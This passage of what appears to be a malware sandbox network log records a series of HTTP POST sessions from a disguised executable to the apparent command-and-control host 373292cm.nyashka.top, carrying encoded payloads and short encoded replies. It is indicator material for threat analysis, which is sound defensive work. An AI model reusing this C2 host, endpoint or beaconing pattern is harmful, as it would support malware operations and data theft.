                                    Data Ascii: _S\UTFTY[_ZQYWXWWZ]RWQSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;3!3 )-,(=!])-< 7P4!$(3\# \,&F$.Y/)
                                    Aug 25, 2024 15:46:40.490339041 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:40.618865967 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    68 | 192.168.2.8 | 49781 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:40.752341032 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:41.105326891 CEST2544OUTData Raw: 5a 50 5c 50 54 48 54 5e 5b 5f 5a 51 59 54 58 5e 57 58 5d 5d 57 5a 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZP\PTHT^[_ZQYTX^WX]]WZSXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/D!#0%]* +><-7,#W (+ V";&F$.Y/)
                                    Aug 25, 2024 15:46:41.427051067 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:41.630727053 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    69 | 192.168.2.8 | 49782 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:41.763760090 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:42.120860100 CEST2544OUTData Raw: 5f 56 5c 5f 54 40 51 59 5b 5f 5a 51 59 5e 58 53 57 58 5d 5f 57 5c 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\_T@QY[_ZQY^XSWX]_W\SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8U0#=7 )-Y+->(\ Z #!0W();4=Y.>&F$.Y/
                                    Aug 25, 2024 15:46:42.464909077 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:42.577907085 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    70 | 192.168.2.8 | 49783 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:42.822948933 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:43.167788982 CEST2544OUTData Raw: 5f 56 59 53 51 40 54 59 5b 5f 5a 51 59 55 58 5e 57 5b 5d 5c 57 51 53 5f 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYSQ@TY[_ZQYUX^W[]\WQS_YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;3!(\"#=Y)$\<->)-[##,V*)8 *;.&F$.Y/-


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    71 | 192.168.2.8 | 49784 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:43.470828056 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:43.823993921 CEST1860OUTData Raw: 5f 5c 59 52 54 48 51 5e 5b 5f 5a 51 59 53 58 5e 57 5c 5d 5b 57 50 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _\YRTHQ^[_ZQYSX^W\][WPS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q./0#B"47#5)[<]<-++7??V#W,<9 =8&F$.Y/5
                                    Aug 25, 2024 15:46:44.151699066 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:44.287707090 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1c 3e 25 25 01 27 3b 28 19 25 23 2e 52 3e 3e 2b 5e 3d 13 07 1a 24 38 0f 5e 31 07 24 1d 26 38 22 05 28 10 2a 14 26 06 38 03 2c 34 2b 5d 0c 13 22 5f 20 5c 36 5a 26 3f 3f 01 2a 28 23 5e 22 3f 29 01 3f 3a 07 51 28 3c 20 1d 3f 2a 20 00 3c 14 25 0d 38 3b 25 5e 2d 1e 29 0d 34 04 2b 52 0d 11 24 53 2b 3d 39 53 3d 00 11 59 35 5e 2f 12 27 2e 32 55 26 1c 03 0e 26 29 28 5d 32 21 29 1d 33 1f 22 0e 32 05 3e 5a 32 3f 3a 09 22 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &>%%';(%#.R>>+^=$8^1$&8"(*&8,4+]"_ \6Z&??*(#^"?)?:Q(< ?* <%8;%^-)4+R$S+=9S=Y5^/'.2U&&)(]2!)3"2>Z2?:"#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    72 | 192.168.2.8 | 49785 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:43.589890003 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:43.949223995 CEST2544OUTData Raw: 5f 5d 5c 55 54 43 51 5a 5b 5f 5a 51 59 54 58 53 57 50 5d 5a 57 5e 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]\UTCQZ[_ZQYTXSWP]ZW^S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X.##!# %X)=4_+>]+['X#<771?<94*,&F$.Y/)
                                    Aug 25, 2024 15:46:44.253233910 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:44.456104040 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    73 | 192.168.2.8 | 49786 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:44.573406935 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:44.928819895 CEST2544OUTData Raw: 5f 53 59 50 54 46 51 5d 5b 5f 5a 51 59 55 58 5f 57 50 5d 5b 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _SYPTFQ][_ZQYUX_WP][W\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;#?C"=\409X)(]+6(=4"</S 20(*(4V)X,&F$.Y/-
                                    Aug 25, 2024 15:46:45.258770943 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:45.454329014 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    74 | 192.168.2.8 | 49787 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:45.609313965 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:45.964991093 CEST | 2544 | OUT | Data Raw: 5f 50 59 57 54 40 54 5d 5b 5f 5a 51 59 53 58 57 57 5b 5d 52 57 5e 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYWT@T][_ZQYSXWW[]RW^SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,#?D!-8^#0%Z*/<X*(?[ 3P#! R?<"0)8>&F$.Y/5
                                    Aug 25, 2024 15:46:46.283670902 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:46.415956020 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    75 | 192.168.2.8 | 49788 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:46.544878006 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:46.902261019 CEST | 2544 | OUT | Data Raw: 5f 50 59 55 51 43 54 50 5b 5f 5a 51 59 50 58 54 57 5f 5d 5a 57 59 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _PYUQCTP[_ZQYPXTW_]ZWYS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-8U'!0\73!Z+=Y+6?;4Z?V!"$P<0"#%..&F$.Y/
                                    Aug 25, 2024 15:46:47.472341061 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:47.472657919 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:46:47.472697973 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    76 | 192.168.2.8 | 49789 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:47.609419107 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:47.966728926 CEST | 2536 | OUT | Data Raw: 5a 52 5c 50 54 45 51 59 5b 5f 5a 51 59 57 58 54 57 5d 5d 5f 57 5a 53 5d 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZR\PTEQY[_ZQYWXTW]]_WZS]YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.];#,6#7=[=??(=",7P#8<(4V=,&F$.Y/)
                                    Aug 25, 2024 15:46:48.292366982 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:48.491179943 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    77 | 192.168.2.8 | 49790 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:48.622334957 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:48.980273008 CEST | 2544 | OUT | Data Raw: 5f 55 59 57 51 42 54 5d 5b 5f 5a 51 59 52 58 5f 57 5d 5d 5a 57 5e 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _UYWQBT][_ZQYRX_W]]ZW^S\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3!=4^# &)0_<%Z+8#<74!S(:+_"3>/>&F$.Y/1


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    78 | 192.168.2.8 | 49791 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:49.298795938 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:49.652107954 CEST | 1860 | OUT | Data Raw: 5f 5d 59 55 51 45 51 5b 5b 5f 5a 51 59 56 58 5f 57 50 5d 5b 57 5a 53 54 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]YUQEQ[[_ZQYVX_WP][WZSTYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X;E6-<"3&)[4_<X9(>7[7,7'(<7X,.&F$.Y/!
                                    Aug 25, 2024 15:46:49.969765902 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:50.098026991 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 52 2a 1c 2a 11 32 38 2c 53 25 30 21 0d 2a 03 0a 07 29 04 3a 06 33 3b 35 5f 26 3e 38 1d 30 05 35 11 29 3d 36 14 26 2f 3f 59 39 24 2b 5d 0c 13 22 14 20 3a 29 01 26 2f 2b 01 2b 2b 2c 06 21 3f 35 05 28 14 03 55 2b 01 33 01 3c 2a 3f 59 3c 03 31 0b 2c 06 25 5d 3a 20 32 51 37 3e 2b 52 0d 11 27 0a 3f 3e 21 53 3d 2e 33 58 36 28 0d 5b 33 03 21 09 26 32 3a 10 24 07 0a 5c 31 31 26 08 27 08 29 55 24 3b 22 11 32 3f 39 1f 36 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &R**28,S%0!*):3;5_&>805)=6&/?Y9$+]" :)&/+++,!?5(U+3<*?Y<1,%]: 2Q7>+R'?>!S=.3X6([3!&2:$\11&')U$;"2?96#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    79 | 192.168.2.8 | 49792 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:49.423856020 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:49.777689934 CEST | 2544 | OUT | Data Raw: 5f 5c 5c 54 54 47 51 5c 5b 5f 5a 51 59 54 58 52 57 51 5d 5b 57 51 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _\\TTGQ\[_ZQYTXRWQ][WQS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.86=_#35\>0<?=8 <' #*)'_#6,>&F$.Y/)
                                    Aug 25, 2024 15:46:50.090866089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:50.289326906 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    80 | 192.168.2.8 | 49793 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:46:50.527050972 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:46:50.886480093 CEST | 2544 | OUT | Data Raw: 5f 57 5c 56 54 42 54 5e 5b 5f 5a 51 59 53 58 52 57 5d 5d 5f 57 5b 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
